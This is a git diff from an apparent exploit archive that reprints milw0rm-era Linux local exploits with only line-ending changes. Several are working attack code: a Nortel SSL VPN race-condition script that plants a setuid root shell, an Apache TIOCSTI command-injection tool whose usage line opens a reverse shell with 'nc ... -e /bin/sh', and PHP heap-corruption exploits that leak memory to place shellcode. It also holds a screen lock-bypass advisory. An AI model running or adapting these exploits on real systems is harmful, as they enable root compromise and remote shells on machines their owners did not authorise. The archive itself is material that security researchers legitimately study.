"$CMD" >> $CLIENT - echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT - # ensure the original client gets run so as to - # not alert the user - echo "exec $OLD_CLIENT \$@" >> $CLIENT - break - fi - done - - SUCCESS=0 - echo "Waiting for new client to be run" - while (true); do - if [ ! -f $VPN_CLIENT_RUN ]; then - SUCCESS=1 - break - else - sleep 2 - fi - done - - if [ $SUCCESS == 1 ]; then - echo "Success" - return 0 - else - echo "Exploit failed!" - cleanup - exit 1 - fi -} - -suid_shell() { - SH_C="sh_c-$$.c" - - # write out setuid shell - cat >> $SH_C << EOF - #include - #include - int main (int argc, char **argv) { - setuid(0); - setgid(0); - execl("/bin/bash", "bash", NULL); - } -EOF - - # try like hell to get this shell compiled - SH=`mktemp -t vpnshell-$$.XXXXXXXXXX` - gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1 - if [ $? != 0 ]; then - cc -o $SH $SH_C 2>&1 > /dev/null 2>&1 - if [ $? != 0 ]; then - echo "Compilation of shell failed" - echo "Trying backup method..." - run_cmd "cp /bin/sh $SH && chmod 4755 $SH" - while (true); do - if [ -u $SH ]; then - $SH - cleanup - exit - else - sleep 1 - fi - done - echo "Failed" - cleanup - exit 1 - fi - fi - rm -f $SH_C - - run_cmd "chown root:root $SH && chmod 4755 $SH" - - # wait for our shell to be chmod'd - SUCCESS=0 - echo "Waiting for suid shell" - for sleep in `seq 1 60`; do - if [ -u $SH ]; then - echo "Success! setuid shell is $SH" - SUCCESS=1 - break - else - sleep 2 - fi - done - - if [ $SUCCESS == 1 ]; then - cleanup - $SH - else - rm -f $SH - echo "Exploit failed!" - cleanup - exit 1 - fi -} - -CLIENT="/tmp/NetClient/client" - -if [ -f $CLIENT ]; then - echo "client $CLIENT already exists -- forcing stop" - $CLIENT --stop - for sleep in `seq 1 60`; do - if [ ! -f $CLIENT ]; then - break - fi - sleep 1 - done -fi - -# hack to figure out where temp files get put... -TMP_FILE=`mktemp -t $$` -TMP_DIR=`dirname $TMP_FILE` -rm -f $TMP_FILE - -trap cleanup 1 2 3 15 - -# two modes of operation -- get a root shell, or run a cmd as root. -if [ -z "$1" ]; then - suid_shell -else - run_cmd $1 -fi - -cleanup - -# milw0rm.com [2007-02-21] +#!/bin/sh +# +# Nortel SSL VPN Linux Client race condition +# +# Jon Hart +# +# The Linux client that is utilized by versions priot to 6.05 of the Nortel +# SSL VPN appliance suffers from a number of problems that, in combination, +# allow an unprivileged local user to obtain root privileges. +# +# This particular bug is as follows: +# 1) SSL VPN is initiated from the startNetdirect() javascript call +# 2) A zip archive is downloaded to the local machine which contains three +# binaries necessary for the client: askpass, client, and surun. This +# archive is written to /tmp, chmod'd 777, and then it is extracted into +# /tmp/NetClient +# 3) All of these files are chmod'd world writable by the following java +# snippet, which is called on all UNIX client OSs: +# +# protected boolean setPermissions(String file) +# { +# String command = "chmod a+xw " + file; +# try +# { +# Process p = Runtime.getRuntime().exec(command); +# p.waitFor(); +# } +# ... +# } +# +# 4) /tmp/NetClient/surun is executed, which in turn runs +# /tmp/NetClient/askpass. This process aquires the root password, and +# then executes /tmp/NetClient/client via /bin/su and the root password. +# +# There is clearly a bug in step 2 and 3 whereby files are installed world +# writable. The bug I chose to exploit is the race condition in step 4, +# combined with the insecure permissions of steps 2 and 3, which (IMO), +# gives root more easily. The risk here is if you have untrusted accounts +# on the machine from which you access the Nortel VPN, those accounts can +# easily gain local root access. +# +# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear, +# swap it for our "special version", and wait for a shell. +# +# Notes: a /tmp with nosuid will help mitigate this particular _exploit_, +# but not the vulnerability. The same vulnerability also exists in the Mac +# client. +# +# For education and testing purposes only. Only run this on systems that +# you maintain/control. +# + +cleanup() { + rm -f $TMP_DIR/.*-$$\..* +} + + +run_cmd() { + CMD=$@ + VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX` + + echo "Waiting for writable client" + while (true); do + if [ -w $CLIENT ]; then + OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX` + echo "Saving old client" + cp $CLIENT $OLD_CLIENT + chmod 755 $OLD_CLIENT + echo "Writing new \"client\"" + echo "#!/bin/sh" > $CLIENT + echo "$CMD" >> $CLIENT + echo "rm -f $VPN_CLIENT_RUN" >> $CLIENT + # ensure the original client gets run so as to + # not alert the user + echo "exec $OLD_CLIENT \$@" >> $CLIENT + break + fi + done + + SUCCESS=0 + echo "Waiting for new client to be run" + while (true); do + if [ ! -f $VPN_CLIENT_RUN ]; then + SUCCESS=1 + break + else + sleep 2 + fi + done + + if [ $SUCCESS == 1 ]; then + echo "Success" + return 0 + else + echo "Exploit failed!" + cleanup + exit 1 + fi +} + +suid_shell() { + SH_C="sh_c-$$.c" + + # write out setuid shell + cat >> $SH_C << EOF + #include + #include + int main (int argc, char **argv) { + setuid(0); + setgid(0); + execl("/bin/bash", "bash", NULL); + } +EOF + + # try like hell to get this shell compiled + SH=`mktemp -t vpnshell-$$.XXXXXXXXXX` + gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1 + if [ $? != 0 ]; then + cc -o $SH $SH_C 2>&1 > /dev/null 2>&1 + if [ $? != 0 ]; then + echo "Compilation of shell failed" + echo "Trying backup method..." + run_cmd "cp /bin/sh $SH && chmod 4755 $SH" + while (true); do + if [ -u $SH ]; then + $SH + cleanup + exit + else + sleep 1 + fi + done + echo "Failed" + cleanup + exit 1 + fi + fi + rm -f $SH_C + + run_cmd "chown root:root $SH && chmod 4755 $SH" + + # wait for our shell to be chmod'd + SUCCESS=0 + echo "Waiting for suid shell" + for sleep in `seq 1 60`; do + if [ -u $SH ]; then + echo "Success! setuid shell is $SH" + SUCCESS=1 + break + else + sleep 2 + fi + done + + if [ $SUCCESS == 1 ]; then + cleanup + $SH + else + rm -f $SH + echo "Exploit failed!" + cleanup + exit 1 + fi +} + +CLIENT="/tmp/NetClient/client" + +if [ -f $CLIENT ]; then + echo "client $CLIENT already exists -- forcing stop" + $CLIENT --stop + for sleep in `seq 1 60`; do + if [ ! -f $CLIENT ]; then + break + fi + sleep 1 + done +fi + +# hack to figure out where temp files get put... +TMP_FILE=`mktemp -t $$` +TMP_DIR=`dirname $TMP_FILE` +rm -f $TMP_FILE + +trap cleanup 1 2 3 15 + +# two modes of operation -- get a root shell, or run a cmd as root. +if [ -z "$1" ]; then + suid_shell +else + run_cmd $1 +fi + +cleanup + +# milw0rm.com [2007-02-21] diff --git a/platforms/linux/local/3384.c b/platforms/linux/local/3384.c index 878dfb4bd..c13256c4a 100755 --- a/platforms/linux/local/3384.c +++ b/platforms/linux/local/3384.c @@ -1,31 +1,31 @@ -/* - :: Kristian Hermansen :: - Date: 20070229 - Description: Local attacker can influence Apache to direct commands - into an open tty owned by user who started apache process, usually root. - This results in arbitrary command execution. - Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06) - Edgy (6.10), Feisty (7.04). - Notes: Must have CGI execution privileges and - service started manually by root via shell. - Also try adding "Options +ExecCGI" to your .htaccess file. - Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c - Usage: nc -vvv -l -p 31337 - http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d - u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy, - benkurtz, ... and who could forget ... setient (the gremlin)!! -*/ - -#include -#include - -int main(int argc, char *argv[]) { - int pts = open("/dev/tty",O_RDONLY); - while(*argv[1] != '\0') { - ioctl(pts,TIOCSTI,argv[1]); - argv[1]++; - } - return 0; -} - -// milw0rm.com [2007-02-28] +/* + :: Kristian Hermansen :: + Date: 20070229 + Description: Local attacker can influence Apache to direct commands + into an open tty owned by user who started apache process, usually root. + This results in arbitrary command execution. + Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06) + Edgy (6.10), Feisty (7.04). + Notes: Must have CGI execution privileges and + service started manually by root via shell. + Also try adding "Options +ExecCGI" to your .htaccess file. + Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c + Usage: nc -vvv -l -p 31337 + http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d + u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy, + benkurtz, ... and who could forget ... setient (the gremlin)!! +*/ + +#include +#include + +int main(int argc, char *argv[]) { + int pts = open("/dev/tty",O_RDONLY); + while(*argv[1] != '\0') { + ioctl(pts,TIOCSTI,argv[1]); + argv[1]++; + } + return 0; +} + +// milw0rm.com [2007-02-28] diff --git a/platforms/linux/local/339.c b/platforms/linux/local/339.c index 6c2d9dfd4..8dc57eac6 100755 --- a/platforms/linux/local/339.c +++ b/platforms/linux/local/339.c @@ -53,6 +53,6 @@ main() { setenv("HOME", buffer, 1); execl("/usr/bin/zgv", "/usr/bin/zgv", NULL); -} - -// milw0rm.com [1997-06-20] +} + +// milw0rm.com [1997-06-20] diff --git a/platforms/linux/local/3426.php b/platforms/linux/local/3426.php index 654d11f80..690c10a2d 100755 --- a/platforms/linux/local/3426.php +++ b/platforms/linux/local/3426.php @@ -1,94 +1,94 @@ - - -# milw0rm.com [2007-03-07] + + +# milw0rm.com [2007-03-07] diff --git a/platforms/linux/local/3427.php b/platforms/linux/local/3427.php index 80eee4a33..01c93a162 100755 --- a/platforms/linux/local/3427.php +++ b/platforms/linux/local/3427.php @@ -1,68 +1,68 @@ - 0) - break; - } - } - $offset += 1024; - } - - header("Content-type: application/octet-stream"); - header("Content-Disposition: attachment; filename=\"server.der\""); - echo $keydata; -?> - -# milw0rm.com [2007-03-07] + 0) + break; + } + } + $offset += 1024; + } + + header("Content-type: application/octet-stream"); + header("Content-Disposition: attachment; filename=\"server.der\""); + echo $keydata; +?> + +# milw0rm.com [2007-03-07] diff --git a/platforms/linux/local/3440.php b/platforms/linux/local/3440.php index 2609519c2..17517c8be 100755 --- a/platforms/linux/local/3440.php +++ b/platforms/linux/local/3440.php @@ -1,47 +1,47 @@ - - -# milw0rm.com [2007-03-09] + + +# milw0rm.com [2007-03-09] diff --git a/platforms/linux/local/3479.php b/platforms/linux/local/3479.php index b88033a6b..744f01a01 100755 --- a/platforms/linux/local/3479.php +++ b/platforms/linux/local/3479.php @@ -1,154 +1,154 @@ - - -# milw0rm.com [2007-03-14] + + +# milw0rm.com [2007-03-14] diff --git a/platforms/linux/local/3480.php b/platforms/linux/local/3480.php index a46311382..0152d2069 100755 --- a/platforms/linux/local/3480.php +++ b/platforms/linux/local/3480.php @@ -1,159 +1,159 @@ -= 5.2.0"); - } - findOffsets(); // Comment out if you want to just test the crash - - // Convert offsets into strings - $addr1 = pack("L", $offset_1); - $addr2 = pack("L", $offset_2); - - define("C0", $addr1[0]); - define("C1", $addr1[1]); - define("C2", $addr1[2]); - define("C3", $addr1[3]); - - define("M0", $addr2[0]); - define("M1", $addr2[1]); - define("M2", $addr2[2]); - define("M3", $addr2[3]); - - $c=1; - - function myErrorHandler() - { - global $c; - if ($c==1) { $c=0; return true; } - session_id(str_repeat("A", 100)); - - $GLOBALS['str'] = str_repeat("A", 39); - - for ($i=0; $i<7; $i++) { - $GLOBALS['str'][$i*4+0] = M0; - $GLOBALS['str'][$i*4+1] = M1; - $GLOBALS['str'][$i*4+2] = M2; - $GLOBALS['str'][$i*4+3] = M3; - } - $GLOBALS['str'][8*4+0] = C0; - $GLOBALS['str'][8*4+1] = C1; - $GLOBALS['str'][8*4+2] = C2; - $GLOBALS['str'][8*4+3] = C3; - - return true; - } - - function doit() - { - ini_set("session.hash_bits_per_character", 666); - - error_reporting(E_ALL); - set_error_handler("myErrorHandler"); - session_id(str_repeat(":", 39)); - session_start(); - } - - doit(); - - - - - - - // This function uses the substr_compare() vulnerability - // to get the offsets. - - function findOffsets() - { - global $offset_1, $offset_2, $shellcode; - // We need to NOT clear these variables, - // otherwise the heap is too segmented - global $memdump, $d, $arr; - - $sizeofHashtable = 39; - $maxlong = 0x7fffffff; - - // Signature of a big endian Hashtable of size 256 with 1 element - $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; - - $memdump = str_repeat("A", 4096); - for ($i=0; $i<400; $i++) { - $d[$i]=array(); - } - unset($d[350]); - $x = str_repeat("\x01", $sizeofHashtable); - unset($d[351]); - unset($d[352]); - $arr = array(); - for ($i=0; $i<129; $i++) { $arr[$i] = 1; } - $arr[$shellcode] = 1; - for ($i=0; $i<129; $i++) { unset($arr[$i]); } - - // If the libc memcmp leaks the information use it - // otherwise we only get a case insensitive memdump - $b = substr_compare(chr(65),chr(0),0,1,false) != 65; - - for ($i=0; $i<4096; $i++) { - $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - if ($y-$Y == 1 || $Y-$y==1){ - $y = chr($y); - if ($b && strtoupper($y)!=$y) { - if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { - $y = strtoupper($y); - } - } - $memdump[$i] = $y; - } else { - $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); - if ($y-$Y != 1 && $Y-$y!=1){ - $memdump[$i] = chr(1); - } else { - $memdump[$i] = chr(0); - } - } - } - - // Search shellcode and hashtable and calculate memory address - $pos_shellcode = strpos($memdump, $shellcode); - $pos_hashtable = strpos($memdump, $search); - $addr = substr($memdump, $pos_hashtable+6*4, 4); - $addr = unpack("L", $addr); - - // Fill in both offsets - $offset_1 = $addr[1] + 32; - $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; - } - -?> - -# milw0rm.com [2007-03-14] += 5.2.0"); + } + findOffsets(); // Comment out if you want to just test the crash + + // Convert offsets into strings + $addr1 = pack("L", $offset_1); + $addr2 = pack("L", $offset_2); + + define("C0", $addr1[0]); + define("C1", $addr1[1]); + define("C2", $addr1[2]); + define("C3", $addr1[3]); + + define("M0", $addr2[0]); + define("M1", $addr2[1]); + define("M2", $addr2[2]); + define("M3", $addr2[3]); + + $c=1; + + function myErrorHandler() + { + global $c; + if ($c==1) { $c=0; return true; } + session_id(str_repeat("A", 100)); + + $GLOBALS['str'] = str_repeat("A", 39); + + for ($i=0; $i<7; $i++) { + $GLOBALS['str'][$i*4+0] = M0; + $GLOBALS['str'][$i*4+1] = M1; + $GLOBALS['str'][$i*4+2] = M2; + $GLOBALS['str'][$i*4+3] = M3; + } + $GLOBALS['str'][8*4+0] = C0; + $GLOBALS['str'][8*4+1] = C1; + $GLOBALS['str'][8*4+2] = C2; + $GLOBALS['str'][8*4+3] = C3; + + return true; + } + + function doit() + { + ini_set("session.hash_bits_per_character", 666); + + error_reporting(E_ALL); + set_error_handler("myErrorHandler"); + session_id(str_repeat(":", 39)); + session_start(); + } + + doit(); + + + + + + + // This function uses the substr_compare() vulnerability + // to get the offsets. + + function findOffsets() + { + global $offset_1, $offset_2, $shellcode; + // We need to NOT clear these variables, + // otherwise the heap is too segmented + global $memdump, $d, $arr; + + $sizeofHashtable = 39; + $maxlong = 0x7fffffff; + + // Signature of a big endian Hashtable of size 256 with 1 element + $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; + + $memdump = str_repeat("A", 4096); + for ($i=0; $i<400; $i++) { + $d[$i]=array(); + } + unset($d[350]); + $x = str_repeat("\x01", $sizeofHashtable); + unset($d[351]); + unset($d[352]); + $arr = array(); + for ($i=0; $i<129; $i++) { $arr[$i] = 1; } + $arr[$shellcode] = 1; + for ($i=0; $i<129; $i++) { unset($arr[$i]); } + + // If the libc memcmp leaks the information use it + // otherwise we only get a case insensitive memdump + $b = substr_compare(chr(65),chr(0),0,1,false) != 65; + + for ($i=0; $i<4096; $i++) { + $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + if ($y-$Y == 1 || $Y-$y==1){ + $y = chr($y); + if ($b && strtoupper($y)!=$y) { + if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { + $y = strtoupper($y); + } + } + $memdump[$i] = $y; + } else { + $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); + if ($y-$Y != 1 && $Y-$y!=1){ + $memdump[$i] = chr(1); + } else { + $memdump[$i] = chr(0); + } + } + } + + // Search shellcode and hashtable and calculate memory address + $pos_shellcode = strpos($memdump, $shellcode); + $pos_hashtable = strpos($memdump, $search); + $addr = substr($memdump, $pos_hashtable+6*4, 4); + $addr = unpack("L", $addr); + + // Fill in both offsets + $offset_1 = $addr[1] + 32; + $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; + } + +?> + +# milw0rm.com [2007-03-14] diff --git a/platforms/linux/local/3499.php b/platforms/linux/local/3499.php index d2e412e48..0dfd1a450 100755 --- a/platforms/linux/local/3499.php +++ b/platforms/linux/local/3499.php @@ -1,53 +1,53 @@ - 1, "B" => 1); - - function array_compare(&$key1, &$key2) - { - $GLOBALS['a'] = &$key2; - unset($key2); - return 1; - } - - uksort($arr, "array_compare"); - $x=array($shellcode => 1); - - $a[8*4+0] = $a[6*4+0]; - $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian - $a[8*4+2] = $a[6*4+2]; - $a[8*4+3] = $a[6*4+3]; - - unset($x); - -?> - -# milw0rm.com [2007-03-16] + 1, "B" => 1); + + function array_compare(&$key1, &$key2) + { + $GLOBALS['a'] = &$key2; + unset($key2); + return 1; + } + + uksort($arr, "array_compare"); + $x=array($shellcode => 1); + + $a[8*4+0] = $a[6*4+0]; + $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian + $a[8*4+2] = $a[6*4+2]; + $a[8*4+3] = $a[6*4+3]; + + unset($x); + +?> + +# milw0rm.com [2007-03-16] diff --git a/platforms/linux/local/3525.php b/platforms/linux/local/3525.php index d22d24642..6e7418e4c 100755 --- a/platforms/linux/local/3525.php +++ b/platforms/linux/local/3525.php @@ -1,176 +1,176 @@ -> 2, new dummyclass(), $value); - } - - function peek($addr) - { - $GLOBALS['img'] = imagecreate(1, 1); - return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass()); - } - - printf("Using offsets %08x and %08x\n", $offset_1, $offset_2); - - error_reporting(E_ALL); - set_error_handler("myErrorHandler"); - poke($offset_2, $offset_1); - unset($d); - - - - - - - - - - - - - - - - - // This function uses the substr_compare() vulnerability - // to get the offsets. - - function findOffsets() - { - global $offset_1, $offset_2, $shellcode; - // We need to NOT clear these variables, - // otherwise the heap is too segmented - global $memdump, $d, $arr; - - $sizeofHashtable = 39; - $maxlong = 0x7fffffff; - - // Signature of a big endian Hashtable of size 256 with 1 element - $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; - - $memdump = str_repeat("A", 18192); - for ($i=0; $i<400; $i++) { - $d[$i]=array(); - } - unset($d[350]); - $x = str_repeat("\x01", $sizeofHashtable); - unset($d[351]); - unset($d[352]); - $arr = array(); - for ($i=0; $i<129; $i++) { $arr[$i] = 1; } - $arr[$shellcode] = 1; - for ($i=0; $i<129; $i++) { unset($arr[$i]); } - - // If the libc memcmp leaks the information use it - // otherwise we only get a case insensitive memdump - $b = substr_compare(chr(65),chr(0),0,1,false) != 65; - - for ($i=0; $i<18192; $i++) { - $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - if ($y-$Y == 1 || $Y-$y==1){ - $y = chr($y); - if ($b && strtoupper($y)!=$y) { - if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { - $y = strtoupper($y); - } - } - $memdump[$i] = $y; - } else { - $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); - $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); - if ($y-$Y != 1 && $Y-$y!=1){ - $memdump[$i] = chr(1); - } else { - $memdump[$i] = chr(0); - } - } - } - - // Search shellcode and hashtable and calculate memory address - $pos_shellcode = strpos($memdump, $shellcode); - $pos_hashtable = strpos($memdump, $search); - - if ($pos_shellcode == 0 || $pos_hashtable == 0) { - die ("Unable to find offsets"); - } - - $addr = substr($memdump, $pos_hashtable+6*4, 4); - $addr = unpack("L", $addr); - // Fill in both offsets - $offset_1 = $addr[1] + 32; - $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; - } -?> - -# milw0rm.com [2007-03-20] +> 2, new dummyclass(), $value); + } + + function peek($addr) + { + $GLOBALS['img'] = imagecreate(1, 1); + return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass()); + } + + printf("Using offsets %08x and %08x\n", $offset_1, $offset_2); + + error_reporting(E_ALL); + set_error_handler("myErrorHandler"); + poke($offset_2, $offset_1); + unset($d); + + + + + + + + + + + + + + + + + // This function uses the substr_compare() vulnerability + // to get the offsets. + + function findOffsets() + { + global $offset_1, $offset_2, $shellcode; + // We need to NOT clear these variables, + // otherwise the heap is too segmented + global $memdump, $d, $arr; + + $sizeofHashtable = 39; + $maxlong = 0x7fffffff; + + // Signature of a big endian Hashtable of size 256 with 1 element + $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"; + + $memdump = str_repeat("A", 18192); + for ($i=0; $i<400; $i++) { + $d[$i]=array(); + } + unset($d[350]); + $x = str_repeat("\x01", $sizeofHashtable); + unset($d[351]); + unset($d[352]); + $arr = array(); + for ($i=0; $i<129; $i++) { $arr[$i] = 1; } + $arr[$shellcode] = 1; + for ($i=0; $i<129; $i++) { unset($arr[$i]); } + + // If the libc memcmp leaks the information use it + // otherwise we only get a case insensitive memdump + $b = substr_compare(chr(65),chr(0),0,1,false) != 65; + + for ($i=0; $i<18192; $i++) { + $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + if ($y-$Y == 1 || $Y-$y==1){ + $y = chr($y); + if ($b && strtoupper($y)!=$y) { + if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { + $y = strtoupper($y); + } + } + $memdump[$i] = $y; + } else { + $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); + $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); + if ($y-$Y != 1 && $Y-$y!=1){ + $memdump[$i] = chr(1); + } else { + $memdump[$i] = chr(0); + } + } + } + + // Search shellcode and hashtable and calculate memory address + $pos_shellcode = strpos($memdump, $shellcode); + $pos_hashtable = strpos($memdump, $search); + + if ($pos_shellcode == 0 || $pos_hashtable == 0) { + die ("Unable to find offsets"); + } + + $addr = substr($memdump, $pos_hashtable+6*4, 4); + $addr = unpack("L", $addr); + // Fill in both offsets + $offset_1 = $addr[1] + 32; + $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; + } +?> + +# milw0rm.com [2007-03-20] diff --git a/platforms/linux/local/3529.php b/platforms/linux/local/3529.php index d0275e673..0d7ed3fa9 100755 --- a/platforms/linux/local/3529.php +++ b/platforms/linux/local/3529.php @@ -1,133 +1,133 @@ - - -# milw0rm.com [2007-03-20] + + +# milw0rm.com [2007-03-20] diff --git a/platforms/linux/local/3571.php b/platforms/linux/local/3571.php index 4bef9865f..0da1d2d03 100755 --- a/platforms/linux/local/3571.php +++ b/platforms/linux/local/3571.php @@ -1,43 +1,43 @@ - - -# milw0rm.com [2007-03-25] + + +# milw0rm.com [2007-03-25] diff --git a/platforms/linux/local/3572.php b/platforms/linux/local/3572.php index 9c176a3a3..b1125c614 100755 --- a/platforms/linux/local/3572.php +++ b/platforms/linux/local/3572.php @@ -1,112 +1,112 @@ - - -# milw0rm.com [2007-03-25] + + +# milw0rm.com [2007-03-25] diff --git a/platforms/linux/local/369.pl b/platforms/linux/local/369.pl index 9f929bbbd..f35500ee0 100755 --- a/platforms/linux/local/369.pl +++ b/platforms/linux/local/369.pl @@ -37,6 +37,6 @@ evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode wavFile = open("britney.wav", "wb") wavFile.write(evilBuf) wavFile.close() -print "Evil Song has been created :Pp" - -# milw0rm.com [2004-08-01] +print "Evil Song has been created :Pp" + +# milw0rm.com [2004-08-01] diff --git a/platforms/linux/local/375.c b/platforms/linux/local/375.c index 9e615cf38..8077f030c 100755 --- a/platforms/linux/local/375.c +++ b/platforms/linux/local/375.c @@ -198,6 +198,6 @@ int main(int ac, char **av) kill(cpid, 9); return 0; -} - -// milw0rm.com [2004-08-04] +} + +// milw0rm.com [2004-08-04] diff --git a/platforms/linux/local/393.c b/platforms/linux/local/393.c index 129cb047f..c6e6b6d99 100755 --- a/platforms/linux/local/393.c +++ b/platforms/linux/local/393.c @@ -103,6 +103,6 @@ int main(int argc, char **argv) } return 0; -} - -// milw0rm.com [2004-08-13] +} + +// milw0rm.com [2004-08-13] diff --git a/platforms/linux/local/4028.txt b/platforms/linux/local/4028.txt index 4f0cca5fc..5ae820d99 100755 --- a/platforms/linux/local/4028.txt +++ b/platforms/linux/local/4028.txt @@ -1,64 +1,64 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Rembrandt -Date : 2007-06-03 -Affected Software: screen <= 4.0.3 -Affected OS : OpenBSD up to 4.4 (and propably others) -Type : Local Authentication Bypass - -OSVDB : 39587 -Milw0rm : 4028 -CVE : 2007-3048 -ISS X-Force: : 34693 - -screen, on some operating systems, is vulnerable to a local terminal screen -lock authentication bypass that may allow physically proximate attackers to -gain access to the system. - -This issue has been confirmed on OpenBSD with screen 4.0.3 on x86/amd64. -The underlying vulnerability may be related to 3rd party authentication such -as PAM. This issue was tested on OpenSuSE with screen 4.0.2 and was not -vulnerable. - - -Steps to reproduce: - -$ screen -S test -[Screened session starts] -$ id -uid=1001(test) gid=1001(test) groups=1001(test) -$ -[type ctrl-a x] -Key: test -Again: test -Screen used by test . -Password: -[type ctrl-c] -$ screen -r -[Regained access to screen, without password] - -The screen lock mechanism is designed to lock a terminal, not the entire shell -session. If an attacker has shell access to the target account, it is understood -they can bypass protection. However, on the system tested, the screen lock -mechanism was bypassed using 'ctrl-c'. - -The vulnerability is not in OpenBSD. screen developers indicate this is known -behavior, but do not appear to fully understand the scenario with which -this can be abused. Replies to my initial disclosure suggest this may be -related to PAM authentication, or another 3rd party package. Testing was -not performed to fully identify the vulnerable code. - -Tobias Ulmer has committed a patch to the screen code that prevents -this exploit from happening. - - -Kind regards, -Rembrandt - -# milw0rm.com [2008-06-18] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Rembrandt +Date : 2007-06-03 +Affected Software: screen <= 4.0.3 +Affected OS : OpenBSD up to 4.4 (and propably others) +Type : Local Authentication Bypass + +OSVDB : 39587 +Milw0rm : 4028 +CVE : 2007-3048 +ISS X-Force: : 34693 + +screen, on some operating systems, is vulnerable to a local terminal screen +lock authentication bypass that may allow physically proximate attackers to +gain access to the system. + +This issue has been confirmed on OpenBSD with screen 4.0.3 on x86/amd64. +The underlying vulnerability may be related to 3rd party authentication such +as PAM. This issue was tested on OpenSuSE with screen 4.0.2 and was not +vulnerable. + + +Steps to reproduce: + +$ screen -S test +[Screened session starts] +$ id +uid=1001(test) gid=1001(test) groups=1001(test) +$ +[type ctrl-a x] +Key: test +Again: test +Screen used by test . +Password: +[type ctrl-c] +$ screen -r +[Regained access to screen, without password] + +The screen lock mechanism is designed to lock a terminal, not the entire shell +session. If an attacker has shell access to the target account, it is understood +they can bypass protection. However, on the system tested, the screen lock +mechanism was bypassed using 'ctrl-c'. + +The vulnerability is not in OpenBSD. screen developers indicate this is known +behavior, but do not appear to fully understand the scenario with which +this can be abused. Replies to my initial disclosure suggest this may be +related to PAM authentication, or another 3rd party package. Testing was +not performed to fully identify the vulnerable code. + +Tobias Ulmer has committed a patch to the screen code that prevents +this exploit from happening. + + +Kind regards, +Rembrandt + +# milw0rm.com [2008-06-18] diff --git a/platforms/linux/local/417.c b/platforms/linux/local/417.c index 7b27425b6..306dcb6a0 100755 --- a/platforms/linux/local/417.c +++ b/platforms/linux/local/417.c @@ -139,6 +139,6 @@ free(buf2); return 1; -} - -// milw0rm.com [2004-08-25] +} + +// milw0rm.com [2004-08-25] diff --git a/platforms/linux/local/434.sh b/platforms/linux/local/434.sh index 7408b2e95..6cc1f6910 100755 --- a/platforms/linux/local/434.sh +++ b/platforms/linux/local/434.sh @@ -68,6 +68,6 @@ fi rm -f getuid_lib.so unlink $HOME/.cdrdao echo "Entering rootshell ... ;]" -./suid - -# milw0rm.com [2004-09-07] +./suid + +# milw0rm.com [2004-09-07] diff --git a/platforms/linux/local/438.c b/platforms/linux/local/438.c index 11f090344..448a18158 100755 --- a/platforms/linux/local/438.c +++ b/platforms/linux/local/438.c @@ -53,6 +53,6 @@ export RSH=$RSHSAVE export RSHSAVE= # Use our suid bash -./bash -p - -// milw0rm.com [2004-09-11] +./bash -p + +// milw0rm.com [2004-09-11] diff --git a/platforms/linux/local/4460.c b/platforms/linux/local/4460.c index d2105cecd..210ac0e6d 100755 --- a/platforms/linux/local/4460.c +++ b/platforms/linux/local/4460.c @@ 